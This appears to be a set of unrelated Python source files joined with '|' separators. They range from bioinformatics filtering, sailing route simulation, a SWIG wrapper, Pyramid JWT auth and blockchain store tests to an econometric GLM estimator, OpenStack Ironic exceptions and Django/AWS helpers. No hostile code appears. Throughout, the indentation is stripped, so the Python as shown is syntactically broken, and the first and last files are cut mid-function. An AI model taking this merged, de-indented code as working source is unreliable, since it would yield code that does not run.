best = stat_value.copy()
change = True
elif tp_diff < 0:
tp_diff = tp_diff * -1
if float(stat_value["fp"] - best["fp"]) <= 5 * tp_diff:
best = stat_value.copy()
change = True
return best, change
def filter_low_expression(gff_file, args_tss, wig_f_file,
wig_r_file, out_file):
'''filter the low expressed TSS'''
tars = read_gff(gff_file)
refs = read_gff(args_tss.manual_file)
libs, texs = read_libs(args_tss.input_lib, args_tss.wig_folder)
wig_fs = read_wig(wig_f_file, "+", args_tss.libs)
wig_rs = read_wig(wig_r_file, "-", args_tss.libs)
compare_wig(tars, wig_fs, wig_rs)
cutoff = 1
first = True
while True:
stat_value, num_ref = stat(tars, refs, cutoff,
args_tss.gene_length, args_tss.cluster)
if first:
first = False
best = stat_value.copy()
continue
else:
best, change = change_best(num_ref, best, stat_value)
if not change:
break
cutoff = cutoff + 0.1
print_file(tars, cutoff, out_file)
return cutoff
|
class Clock(object):
def __init__(self):
self.igt = None
self.rta = None
|
from setuptools import setup
package_name = 'cair_client'
setup(
name=package_name,
version='0.0.0',
packages=[package_name],
data_files=[
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
('share/' + package_name, ['package.xml']),
],
install_requires=['setuptools'],
zip_safe=True,
maintainer='Lucrezia Grassi',
maintainer_email='lucrezia.grassi@edu.unige.it',
description='Package containing the service that allows to connect to the CAIR cloud.',
license='Apache License 2.0',
tests_require=['pytest'],
entry_points={
'console_scripts': [
'service = cair_client.cair_srv:main',
'client = cair_client.cair_node:main',
],
},
)
|
# 487. Max Consecutive Ones II
# Runtime: 388 ms, faster than 37.74% of Python3 online submissions for Max Consecutive Ones II.
# Memory Usage: 14.4 MB, less than 27.64% of Python3 online submissions for Max Consecutive Ones II.
class Solution:
# Linear Scan
def findMaxConsecutiveOnes(self, nums: list[int]) -> int:
max_count = 0
curr_cnt_count = 0
prev_cnt_count = 0
for n in nums:
curr_cnt_count += 1
if n == 0:
prev_cnt_count = curr_cnt_count
curr_cnt_count = 0
max_count = max(max_count, curr_cnt_count + prev_cnt_count)
return max_count |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 23 16:15:51 2018
@author: jean-mi
"""
import IsochroneClass as IC
import sys
sys.path.append("../model")
from weatherTLKT import Weather
import numpy as np
import simulatorTLKT as SimC
from simulatorTLKT import Simulator
import matplotlib.pyplot as plt
import mpl_toolkits
from mpl_toolkits.basemap import Basemap
import matplotlib
from matplotlib import animation
matplotlib.rcParams.update({'font.size': 16})
import copy
import pickle
import sys
sys.path.append("../solver")
#from MyTree import Tree
from worker import Tree
# %% We load the forecast files
#ATTENTION il faudra prendre le fichier de vent moyen à terme!!!
mydate = '20180108'
modelcycle = '0100z'
pathToSaveObj = '../data/' + mydate + '_gep_' + modelcycle + '.obj'
Wavg = Weather.load(pathToSaveObj)
Wavg=Wavg.crop(latBound=[40, 50], lonBound=[360 - 15, 360])
#mydate = '20170519'
#modelcycle = '00'
#pathToSaveObj = '../data/' + mydate + '_' + modelcycle + '.obj'
#Wavg = Weather.load(pathToSaveObj)
# %% We shift the times so that all times are in the correct bounds for interpolations
Tini = Wavg.time[0]
Wavg.time = Wavg.time - Tini
# %% We set up the parameters of the simulation
# times=np.arange(0,min([Wavg.time[-1],Wspr.time[-1]]),1*HOURS_TO_DAY)
# Tf=len(times)
Tf = 24 * 8
HOURS_TO_DAY = 1/24
times = np.arange(0, Tf * HOURS_TO_DAY, 6 * HOURS_TO_DAY)
lats = np.arange(Wavg.lat[0],Wavg.lat[-1], 0.05)
lons = np.arange(Wavg.lon[0], Wavg.lon[-1], 0.05)
stateInit = [0, 47.5, -3.5 + 360]
SimC.Boat.UNCERTAINTY_COEFF = 0
Sim = Simulator(times, lats, lons, Wavg, stateInit)
# %% We set up the parameters of the simulation : destination
heading = 240
tours = 0
tra = []
for t in Sim.times[0:-1]:
tours +=1
tra.append(list(Sim.doStep(heading)))
destination = Sim.state[1:3]
#for t in Sim.times[0:8]:
# tours +=1
# tra.append(list(Sim.doStep(heading)))
#destination = Sim.state[1:3]
# %% test déterministe pour la class IsochroneClass
Sim.reset(stateInit)
solver_iso = IC.Isochrone(Sim,stateInit[1:3],destination,delta_cap=10,increment_cap=9,nb_secteur=100,resolution=200)
temps,politique,politique_finale,trajectoire = solver_iso.isochrone_methode()
print('temps isochrones :',temps) #attention manière de le calculer
print('temps ligne droite :',tours*solver_iso.delta_t) #temps obtenu en faisant la ligne droite (sur 8 pas de temps on est moins bon mais sur la simu plus longue on gagne une demie journée)
#print(politique)
#print(politique_finale)
#print(trajectoire)
states = solver_iso.positions_to_states()
basemap = solver_iso.sim.prepareBaseMap(proj='mill',res='i',Dline=10,dl=1.5,dh=1,centerOfMap=None)
solver_iso.sim.plotTraj(states,basemap,quiv=True)
print(destination)
# %% test stochastique pour la class IsochroneClass
SimC.Boat.UNCERTAINTY_COEFF = 0.4
Sim.reset(stateInit)
liste_states = []
liste_states.append(np.array(stateInit))
for i in range(len((politique))):
Sim.doStep(politique[i])
liste_states.append(np.array(Sim.state))
print(Sim.state[1:3])
basemap = solver_iso.sim.prepareBaseMap()
solver_iso.sim.plotTraj(liste_states,basemap,quiv=True)
x,y = basemap(destination[0],destination[1])
basemap.scatter(x,y,zorder=3,color='green',label='') #pt mal placé
#%% affichage des isochrones utilisées
basemap = solver_iso.sim.prepareBaseMap()
ind = 0
for isochrone in solver_iso.isochrone_stock:
for state in isochrone:
x,y = basemap(state[1],state[2])
#basemap.plot(x,y,markersize=4,zorder=ind,color='blue')
basemap.scatter(x,y,zorder=ind,color='green',label='')
ind += 1
#%% point discriminant
pt_discri = [20,45.9,352.55]
Sim.reset(pt_discri)
solver_iso = IC.Isochrone(Sim,pt_discri[1:3],destination,delta_cap=5,increment_cap=18,nb_secteur=200,resolution=100)
temps,politique,politique_finale,trajectoire = solver_iso.isochrone_methode()
print('temps isochrones :',temps) #attention manière de le calculer
#temps obtenu en faisant la ligne droite (sur 8 pas de temps on est moins bon mais sur la simu plus longue on gagne une demie journée)
#print(politique)
#print(politique_finale)
#print(trajectoire)
states = solver_iso.positions_to_states()
basemap = solver_iso.sim.prepareBaseMap(proj='mill',res='i',Dline=10,dl=1.5,dh=1,centerOfMap=None)
solver_iso.sim.plotTraj(states,basemap,quiv=True) |
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.7
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_SimFlowEnergyTransferStorage_HotWaterTank_Expansion', [dirname(__file__)])
except ImportError:
import _SimFlowEnergyTransferStorage_HotWaterTank_Expansion
return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion
if fp is not None:
try:
_mod = imp.load_module('_SimFlowEnergyTransferStorage_HotWaterTank_Expansion', fp, pathname, description)
finally:
fp.close()
return _mod
_SimFlowEnergyTransferStorage_HotWaterTank_Expansion = swig_import_helper()
del swig_import_helper
else:
import _SimFlowEnergyTransferStorage_HotWaterTank_Expansion
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr_nondynamic(self, class_type, name, static=1):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
if (not static):
return object.__getattr__(self, name)
else:
raise AttributeError(name)
def _swig_getattr(self, class_type, name):
return _swig_getattr_nondynamic(self, class_type, name, 0)
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object:
pass
_newclass = 0
try:
import weakref
weakref_proxy = weakref.proxy
except:
weakref_proxy = lambda x: x
import SimFlowEnergyTransferStorage_HotWaterTank_Mixed
import base
class SimFlowEnergyTransferStorage_HotWaterTank_Expansion(SimFlowEnergyTransferStorage_HotWaterTank_Mixed.SimFlowEnergyTransferStorage_HotWaterTank):
__swig_setmethods__ = {}
for _s in [SimFlowEnergyTransferStorage_HotWaterTank_Mixed.SimFlowEnergyTransferStorage_HotWaterTank]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimFlowEnergyTransferStorage_HotWaterTank_Expansion, name, value)
__swig_getmethods__ = {}
for _s in [SimFlowEnergyTransferStorage_HotWaterTank_Mixed.SimFlowEnergyTransferStorage_HotWaterTank]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimFlowEnergyTransferStorage_HotWaterTank_Expansion, name)
__repr__ = _swig_repr
def EffectiveCapacity(self, *args):
return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_EffectiveCapacity(self, *args)
def __init__(self, *args):
this = _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.new_SimFlowEnergyTransferStorage_HotWaterTank_Expansion(*args)
try:
self.this.append(this)
except:
self.this = this
def _clone(self, f=0, c=None):
return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion__clone(self, f, c)
__swig_destroy__ = _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.delete_SimFlowEnergyTransferStorage_HotWaterTank_Expansion
__del__ = lambda self: None
SimFlowEnergyTransferStorage_HotWaterTank_Expansion_swigregister = _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_swigregister
SimFlowEnergyTransferStorage_HotWaterTank_Expansion_swigregister(SimFlowEnergyTransferStorage_HotWaterTank_Expansion)
class SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence(base.sequence_common):
__swig_setmethods__ = {}
for _s in [base.sequence_common]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence, name, value)
__swig_getmethods__ = {}
for _s in [base.sequence_common]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.new_SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence(*args)
try:
self.this.append(this)
except:
self.this = this
def assign(self, n, x):
return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_assign(self, n, x)
def begin(self, *args):
return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_begin(self, *args)
def end(self, *args):
return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_end(self, *args)
def rbegin(self, *args):
return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_rbegin(self, *args)
def rend(self, *args):
return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_rend(self, *args)
def at(self, *args):
return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_at(self, *args)
def front(self, *args):
return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_front(self, *args)
def back(self, *args):
return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_back(self, *args)
def push_back(self, *args):
return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_push_back(self, *args)
def pop_back(self):
return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_pop_back(self)
def detach_back(self, pop=True):
return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_detach_back(self, pop)
def insert(self, *args):
return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_insert(self, *args)
def erase(self, *args):
return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_erase(self, *args)
def detach(self, position, r, erase=True):
return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_detach(self, position, r, erase)
def swap(self, x):
return _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_swap(self, x)
__swig_destroy__ = _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.delete_SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence
__del__ = lambda self: None
SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_swigregister = _SimFlowEnergyTransferStorage_HotWaterTank_Expansion.SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_swigregister
SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence_swigregister(SimFlowEnergyTransferStorage_HotWaterTank_Expansion_sequence)
# This file is compatible with both classic and new-style classes.
|
#!/usr/bin/env monkeyrunner
import time
from com.android.monkeyrunner import MonkeyRunner, MonkeyDevice
device = MonkeyRunner.waitForConnection()
# Touch down screen
device.touch(100, 500, MonkeyDevice.DOWN)
# Move from 100, 500 to 300, 500
for i in range(1, 11):
device.touch(100 + 20 * i, 500, MonkeyDevice.MOVE)
print "move ", 100 + 20 * i, 500
time.sleep(0.1)
# Move from (300, 500 to 200, 500)
for i in range(1, 11):
device.touch(300, 500 - 10 * i, MonkeyDevice.MOVE)
print "move ", 300, 500 - 10 * i
time.sleep(0.1)
# Remove finger from screen
device.touch(300, 400, MonkeyDevice.UP) |
"""Authentication & Authorization."""
from conduit.auth.models import User
from pyramid.authorization import ACLAuthorizationPolicy
from pyramid.config import Configurator
from pyramid.request import Request
from pyramid.security import Allow
import typing as t
def includeme(config: Configurator) -> None:
"""Pyramid knob."""
# Pyramid requires an authorization policy to be active.
config.set_authorization_policy(ACLAuthorizationPolicy())
# Enable JWT authentication.
config.include("pyramid_jwt")
config.set_jwt_authentication_policy(
config.registry.settings["jwt.secret"], auth_type="Token"
)
# Add API routes for auth
config.add_route("user", "/api/user")
config.add_route("users", "/api/users")
config.add_route("users.login", "/api/users/login")
# Add request.user shorthand
config.add_request_method(get_user, "user", reify=True)
def get_user(request: Request) -> t.Optional[User]:
"""Never to be called directly, exposes request.user."""
return User.by_id(request.authenticated_userid, db=request.db)
class RootFactory:
"""Give all Authenticated users the "authenticated" permission."""
user: t.Optional[User] = None
@property
def __acl__(self) -> t.List[t.Tuple]:
"""If JWT is correctly decoded and user exists, grant them permissions."""
if self.user:
return [(Allow, str(self.user.id), "authenticated")]
return []
def __init__(self, request: Request) -> None:
if request.authenticated_userid:
self.user = request.user
|
from functools import wraps
from sqlalchemy.exc import SQLAlchemyError
from sqlalchemy.ext.compiler import compiles
from sqlalchemy.sql import expression
from sqlalchemy.types import DateTime
from pygmy.config import config
def dbconnection(func):
@wraps(func)
def _wrapped(*args, **kwargs):
try:
if len(args) > 0:
return func(args[0], config.db.store, *args[1:], **kwargs)
else:
return func(config.db.store, **kwargs)
except SQLAlchemyError:
config.db.store.rollback()
raise
return _wrapped
class utcnow(expression.FunctionElement):
type = DateTime()
@compiles(utcnow)
def __utcnow_default(element, compiler, **kw):
return 'CURRENT_TIMESTAMP'
# @compiles(utcnow, 'mysql')
# def __utcnow_mysql(element, compiler, **kw):
# return 'UTC_TIMESTAMP()'
@compiles(utcnow, 'postgresql')
def __utcnow_pg(element, compiler, **kw):
return "CLOCK_TIMESTAMP()"
|
import asyncio
import random
import sqlite3
from pathlib import Path
import aiosqlite
import pytest
from achi.consensus.blockchain import Blockchain
from achi.full_node.block_store import BlockStore
from achi.full_node.coin_store import CoinStore
from achi.util.db_wrapper import DBWrapper
from tests.setup_nodes import bt, test_constants
@pytest.fixture(scope="module")
def event_loop():
loop = asyncio.get_event_loop()
yield loop
class TestBlockStore:
@pytest.mark.asyncio
async def test_block_store(self):
assert sqlite3.threadsafety == 1
blocks = bt.get_consecutive_blocks(10)
db_filename = Path("blockchain_test.db")
db_filename_2 = Path("blockchain_test2.db")
if db_filename.exists():
db_filename.unlink()
if db_filename_2.exists():
db_filename_2.unlink()
connection = await aiosqlite.connect(db_filename)
connection_2 = await aiosqlite.connect(db_filename_2)
db_wrapper = DBWrapper(connection)
db_wrapper_2 = DBWrapper(connection_2)
# Use a different file for the blockchain
coin_store_2 = await CoinStore.create(db_wrapper_2)
store_2 = await BlockStore.create(db_wrapper_2)
bc = await Blockchain.create(coin_store_2, store_2, test_constants)
store = await BlockStore.create(db_wrapper)
await BlockStore.create(db_wrapper_2)
try:
# Save/get block
for block in blocks:
await bc.receive_block(block)
block_record = bc.block_record(block.header_hash)
block_record_hh = block_record.header_hash
await store.add_full_block(block.header_hash, block, block_record)
await store.add_full_block(block.header_hash, block, block_record)
assert block == await store.get_full_block(block.header_hash)
assert block == await store.get_full_block(block.header_hash)
assert block_record == (await store.get_block_record(block_record_hh))
await store.set_peak(block_record.header_hash)
await store.set_peak(block_record.header_hash)
assert len(await store.get_full_blocks_at([1])) == 1
assert len(await store.get_full_blocks_at([0])) == 1
assert len(await store.get_full_blocks_at([100])) == 0
# Get blocks
block_record_records = await store.get_block_records()
assert len(block_record_records[0]) == len(blocks)
# Peak is correct
assert block_record_records[1] == blocks[-1].header_hash
except Exception:
await connection.close()
await connection_2.close()
db_filename.unlink()
db_filename_2.unlink()
raise
await connection.close()
await connection_2.close()
db_filename.unlink()
db_filename_2.unlink()
@pytest.mark.asyncio
async def test_deadlock(self):
"""
This test was added because the store was deadlocking in certain situations, when fetching and
adding blocks repeatedly. The issue was patched.
"""
blocks = bt.get_consecutive_blocks(10)
db_filename = Path("blockchain_test.db")
db_filename_2 = Path("blockchain_test2.db")
if db_filename.exists():
db_filename.unlink()
if db_filename_2.exists():
db_filename_2.unlink()
connection = await aiosqlite.connect(db_filename)
connection_2 = await aiosqlite.connect(db_filename_2)
wrapper = DBWrapper(connection)
wrapper_2 = DBWrapper(connection_2)
store = await BlockStore.create(wrapper)
coin_store_2 = await CoinStore.create(wrapper_2)
store_2 = await BlockStore.create(wrapper_2)
bc = await Blockchain.create(coin_store_2, store_2, test_constants)
block_records = []
for block in blocks:
await bc.receive_block(block)
block_records.append(bc.block_record(block.header_hash))
tasks = []
for i in range(10000):
rand_i = random.randint(0, 9)
if random.random() < 0.5:
tasks.append(
asyncio.create_task(
store.add_full_block(blocks[rand_i].header_hash, blocks[rand_i], block_records[rand_i])
)
)
if random.random() < 0.5:
tasks.append(asyncio.create_task(store.get_full_block(blocks[rand_i].header_hash)))
await asyncio.gather(*tasks)
await connection.close()
await connection_2.close()
db_filename.unlink()
db_filename_2.unlink()
|
"""Estimates the semilinear Choo and Siow homoskedastic (2006) model
using Poisson GLM.
"""
from typing import Optional
from math import sqrt
import numpy as np
import scipy.linalg as spla
import scipy.sparse as spr
from sklearn import linear_model
from .matching_utils import Matching, _make_XY_K_mat, _variance_muhat
from .poisson_glm_utils import PoissonGLMResults, _prepare_data
def choo_siow_poisson_glm(
muhat: Matching,
phi_bases: np.ndarray,
tol: Optional[float] = 1e-12,
max_iter: Optional[int] = 10000,
verbose: Optional[int] = 1,
) -> PoissonGLMResults:
"""Estimates the semilinear Choo and Siow homoskedastic (2006) model
using Poisson GLM.
Args:
muhat: the observed Matching
phi_bases: an (X, Y, K) array of bases
tol: tolerance level for `linear_model.PoissonRegressor.fit`
max_iter: maximum number of iterations
for `linear_model.PoissonRegressor.fit`
verbose: defines how much output we want (0 = least)
Returns:
a `PoissonGLMResults` instance
Example:
```py
n_households = 1e6
X, Y, K = 4, 3, 6
# we setup a quadratic set of basis functions
phi_bases = np.zeros((X, Y, K))
phi_bases[:, :, 0] = 1
for x in range(X):
phi_bases[x, :, 1] = x
phi_bases[x, :, 3] = x * x
for y in range(Y):
phi_bases[x, y, 4] = x * y
for y in range(Y):
phi_bases[:, y, 2] = y
phi_bases[:, y, 5] = y * y
lambda_true = np.random.randn(K)
phi_bases = np.random.randn(X, Y, K)
Phi = phi_bases @ lambda_true
# we simulate a Choo and Siow sample from a population
# with equal numbers of men and women of each type
n = np.ones(X)
m = np.ones(Y)
choo_siow_instance = ChooSiowPrimitives(Phi, n, m)
mus_sim = choo_siow_instance.simulate(n_households)
muxy_sim, mux0_sim, mu0y_sim, n_sim, m_sim = mus_sim.unpack()
results = choo_siow_poisson_glm(mus_sim, phi_bases)
# compare true and estimated parameters
results.print_results(
lambda_true,
u_true=-np.log(mux0_sim / n_sim),
v_true=-np.log(mu0y_sim / m_sim)
)
```
"""
try_sparse = False
X, Y, K = phi_bases.shape
XY = X * Y
n_rows = XY + X + Y
n_cols = X + Y + K
# the vector of weights for the Poisson regression
w = np.concatenate((2 * np.ones(XY), np.ones(X + Y)))
# reshape the bases
phi_mat = _make_XY_K_mat(phi_bases)
if try_sparse:
w_mat = spr.csr_matrix(
np.concatenate((2 * np.ones(XY, n_cols), np.ones(X + Y, n_cols)))
)
# construct the Z matrix
ones_X = spr.csr_matrix(np.ones((X, 1)))
ones_Y = spr.csr_matrix(np.ones((Y, 1)))
zeros_XK = spr.csr_matrix(np.zeros((X, K)))
zeros_YK = spr.csr_matrix(np.zeros((Y, K)))
zeros_XY = spr.csr_matrix(np.zeros((X, Y)))
zeros_YX = spr.csr_matrix(np.zeros((Y, X)))
id_X = spr.csr_matrix(np.eye(X))
id_Y = spr.csr_matrix(np.eye(Y))
Z_unweighted = spr.vstack(
[
spr.hstack([-spr.kron(id_X, ones_Y), -spr.kron(ones_X, id_Y), phi_mat]),
spr.hstack([-id_X, zeros_XY, zeros_XK]),
spr.hstack([zeros_YX, -id_Y, zeros_YK]),
]
)
Z = Z_unweighted / w_mat
else:
ones_X = np.ones((X, 1))
ones_Y = np.ones((Y, 1))
zeros_XK = np.zeros((X, K))
zeros_YK = np.zeros((Y, K))
zeros_XY = np.zeros((X, Y))
zeros_YX = np.zeros((Y, X))
id_X = np.eye(X)
id_Y = np.eye(Y)
Z_unweighted = np.vstack(
[
np.hstack([-np.kron(id_X, ones_Y), -np.kron(ones_X, id_Y), phi_mat]),
np.hstack([-id_X, zeros_XY, zeros_XK]),
np.hstack([zeros_YX, -id_Y, zeros_YK]),
]
)
Z = Z_unweighted / w.reshape((-1, 1))
_, _, _, n, m = muhat.unpack()
var_muhat, var_munm = _variance_muhat(muhat)
(
muxyhat_norm,
var_muhat_norm,
var_munm_norm,
n_households,
n_individuals,
) = _prepare_data(muhat, var_muhat, var_munm)
clf = linear_model.PoissonRegressor(
fit_intercept=False, tol=tol, verbose=verbose, alpha=0, max_iter=max_iter
)
clf.fit(Z, muxyhat_norm, sample_weight=w)
gamma_est = clf.coef_
# we compute the variance-covariance of the estimator
nr, nc = Z.shape
exp_Zg = np.exp(Z @ gamma_est).reshape(n_rows)
A_hat = np.zeros((nc, nc))
B_hat = np.zeros((nc, nc))
for i in range(nr):
Zi = Z[i, :]
wi = w[i]
A_hat += wi * exp_Zg[i] * np.outer(Zi, Zi)
for j in range(nr):
Zj = Z[j, :]
B_hat += wi * w[j] * var_muhat_norm[i, j] * np.outer(Zi, Zj)
A_inv = spla.inv(A_hat)
variance_gamma = A_inv @ B_hat @ A_inv
stderrs_gamma = np.sqrt(np.diag(variance_gamma))
beta_est = gamma_est[-K:]
beta_std = stderrs_gamma[-K:]
Phi_est = phi_bases @ beta_est
# we correct for the effect of the normalization
n_norm = n / n_individuals
m_norm = m / n_individuals
u_est = gamma_est[:X] + np.log(n_norm)
v_est = gamma_est[X:-K] + np.log(m_norm)
# since u = a + log(n_norm) we also need to adjust the estimated variance
z_unweighted_T = Z_unweighted.T
u_std = np.zeros(X)
ix = XY
for x in range(X):
n_norm_x = n_norm[x]
A_inv_x = A_inv[x, :]
var_log_nx = var_munm_norm[ix, ix] / n_norm_x / n_norm_x
slice_x = slice(x * Y, (x + 1) * Y)
covar_term = var_muhat_norm[:, ix] + np.sum(var_muhat_norm[:, slice_x], 1)
cov_a_lognx = (A_inv_x @ z_unweighted_T @ covar_term) / n_norm_x
ux_var = variance_gamma[x, x] + var_log_nx + 2.0 * cov_a_lognx
u_std[x] = sqrt(ux_var)
ix += 1
v_std = stderrs_gamma[X:-K]
iy, jy = X, XY + X
for y in range(Y):
m_norm_y = m_norm[y]
A_inv_y = A_inv[iy, :]
var_log_my = var_munm_norm[jy, jy] / m_norm_y / m_norm_y
slice_y = slice(y, XY, Y)
covar_term = var_muhat_norm[:, jy] + np.sum(var_muhat_norm[:, slice_y], 1)
cov_b_logmy = (A_inv_y @ z_unweighted_T @ covar_term) / m_norm_y
vy_var = variance_gamma[iy, iy] + var_log_my + 2.0 * cov_b_logmy
v_std[y] = sqrt(vy_var)
iy += 1
jy += 1
results = PoissonGLMResults(
X=X,
Y=Y,
K=K,
number_households=n_households,
number_individuals=n_individuals,
estimated_gamma=gamma_est,
estimated_Phi=Phi_est,
estimated_beta=beta_est,
estimated_u=u_est,
estimated_v=v_est,
variance_gamma=variance_gamma,
stderrs_gamma=stderrs_gamma,
stderrs_beta=beta_std,
stderrs_u=u_std,
stderrs_v=v_std,
)
return results
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Ironic base exception handling.
Includes decorator for re-raising Ironic-type exceptions.
SHOULD include dedicated exception logging.
"""
import logging
import six
from oslo_config import cfg
from ironic_lib.openstack.common._i18n import _
from ironic_lib.openstack.common._i18n import _LE
LOG = logging.getLogger(__name__)
exc_log_opts = [
cfg.BoolOpt('fatal_exception_format_errors',
default=False,
help='Make exception message format errors fatal.'),
]
CONF = cfg.CONF
CONF.register_opts(exc_log_opts)
class IronicException(Exception):
"""Base Ironic Exception
To correctly use this class, inherit from it and define
a 'message' property. That message will get printf'd
with the keyword arguments provided to the constructor.
"""
message = _("An unknown exception occurred.")
code = 500
headers = {}
safe = False
def __init__(self, message=None, **kwargs):
self.kwargs = kwargs
if 'code' not in self.kwargs:
try:
self.kwargs['code'] = self.code
except AttributeError:
pass
if not message:
try:
message = self.message % kwargs
except Exception as e:
# kwargs doesn't match a variable in the message
# log the issue and the kwargs
LOG.exception(_LE('Exception in string format operation'))
for name, value in kwargs.iteritems():
LOG.error("%s: %s" % (name, value))
if CONF.fatal_exception_format_errors:
raise e
else:
# at least get the core message out if something happened
message = self.message
super(IronicException, self).__init__(message)
def format_message(self):
if self.__class__.__name__.endswith('_Remote'):
return self.args[0]
else:
return six.text_type(self)
class InstanceDeployFailure(IronicException):
message = _("Failed to deploy instance: %(reason)s")
class FileSystemNotSupported(IronicException):
message = _("Failed to create a file system. "
"File system %(fs)s is not supported.")
|
import csv
import hashlib
import io
import os
import random
import re
import time
from functools import partial
from multiprocessing import current_process
from typing import Dict
from urllib.parse import urlparse
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
import requests
from retrying import retry
from data_refinery_common.performant_pagination.pagination import PerformantPaginator
# Found: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
METADATA_URL = "http://169.254.169.254/latest/meta-data"
INSTANCE_ID = None
SUPPORTED_MICROARRAY_PLATFORMS = None
SUPPORTED_RNASEQ_PLATFORMS = None
READABLE_PLATFORM_NAMES = None
ANNOTATION_PACKAGE_OVERRIDES = None
def get_env_variable(var_name: str, default: str = None) -> str:
""" Get an environment variable or return a default value """
try:
return os.environ[var_name]
except KeyError:
if default:
return default
error_msg = "Set the %s environment variable" % var_name
raise ImproperlyConfigured(error_msg)
def get_env_variable_gracefully(var_name: str, default: str = None) -> str:
"""
Get an environment variable, or return a default value, but always fail gracefully and return
something rather than raising an ImproperlyConfigured error.
"""
try:
return os.environ[var_name]
except KeyError:
return default
def get_instance_id() -> str:
"""Returns the AWS instance id where this is running or "local"."""
global INSTANCE_ID
if INSTANCE_ID is None:
if settings.RUNNING_IN_CLOUD:
@retry(stop_max_attempt_number=3)
def retrieve_instance_id():
return requests.get(os.path.join(METADATA_URL, "instance-id")).text
INSTANCE_ID = retrieve_instance_id()
else:
INSTANCE_ID = "local"
return INSTANCE_ID
def get_worker_id() -> str:
"""Returns <instance_id>/<thread_id>."""
